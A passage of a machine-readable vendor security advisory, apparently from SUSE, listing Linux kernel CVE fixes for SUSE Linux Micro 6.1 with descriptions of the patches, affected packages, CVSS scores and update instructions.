"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68380",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68380"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: fix peer HE MCS assignment\n\nIn ath11k_wmi_send_peer_assoc_cmd(), peer\u0027s transmit MCS is sent to\nfirmware as receive MCS while peer\u0027s receive MCS sent as transmit MCS,\nwhich goes against firmwire\u0027s definition.\n\nWhile connecting to a misbehaved AP that advertises 0xffff (meaning not\nsupported) for 160 MHz transmit MCS map, firmware crashes due to 0xffff\nis assigned to he_mcs-\u003erx_mcs_set field.\n\n\tExt Tag: HE Capabilities\n\t [...]\n\t Supported HE-MCS and NSS Set\n\t\t[...]\n\t Rx and Tx MCS Maps 160 MHz\n\t\t [...]\n\t Tx HE-MCS Map 160 MHz: 0xffff\n\nSwap the assignment to fix this issue.\n\nAs the HE rate control mask is meant to limit our own transmit MCS, it\nneeds to go via he_mcs-\u003erx_mcs_set field. With the aforementioned swapping\ndone, change is needed as well to apply it to the peer\u0027s receive MCS.\n\nTested-on: WCN6855 hw2.1 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68380",
"url": "https://www.suse.com/security/cve/CVE-2025-68380"
},
{
"category": "external",
"summary": "SUSE Bug 1255580 for CVE-2025-68380",
"url": "https://bugzilla.suse.com/1255580"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68380"
},
{
"cve": "CVE-2025-68724",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68724"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id\n\nUse check_add_overflow() to guard against potential integer overflows\nwhen adding the binary blob lengths and the size of an asymmetric_key_id\nstructure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a\npossible buffer overflow when copying data from potentially malicious\nX.509 certificate fields that can be arbitrarily large, such as ASN.1\nINTEGER serial numbers, issuer names, etc.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68724",
"url": "https://www.suse.com/security/cve/CVE-2025-68724"
},
{
"category": "external",
"summary": "SUSE Bug 1255550 for CVE-2025-68724",
"url": "https://bugzilla.suse.com/1255550"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68724"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
